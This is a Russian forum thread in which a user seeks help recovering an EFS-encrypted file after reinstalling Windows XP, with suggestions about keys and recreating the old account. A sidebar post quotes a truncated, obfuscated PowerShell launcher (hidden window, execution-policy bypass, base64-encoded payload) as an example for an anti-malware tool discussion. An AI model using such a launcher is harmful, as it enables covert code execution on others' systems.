Перейти к содержанию
Zilla

Восстановить зашифрованный файл

Recommended Posts

Zilla

Очень нужна помощь. Файл был зашифрован на вин ХР, после ХР была предустановленна с форматированием диска С, и теперь не знаю как расшифровать этот файл. Файл очень важный.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

andro

Спасибо, но не помогло. Те ключи, что нашла программа для этого файла не подошли.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
andro

Цитата с форума:

Хм. Один раз был такой случай, но под 2003 серваком. Для разрешения вопроса тогда понадобилось создать пользователя с таким же именем и паролем, как был до переустановки, и отдать ему криптованную папку во владение - данные открылись.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

andro

Не помогло, при восстановлении просит ввести пароль, который был на том пользователе, которым файл был зашифрован, ввожу пароль, а он всё равно пишет что не правильный.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ummitium

Выложить файл здесь можете или в ЛС?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Ummitium

Не могу, инфа очень конфиденциальна..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ummitium

Не имея файл на руках трудно вам помочь :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×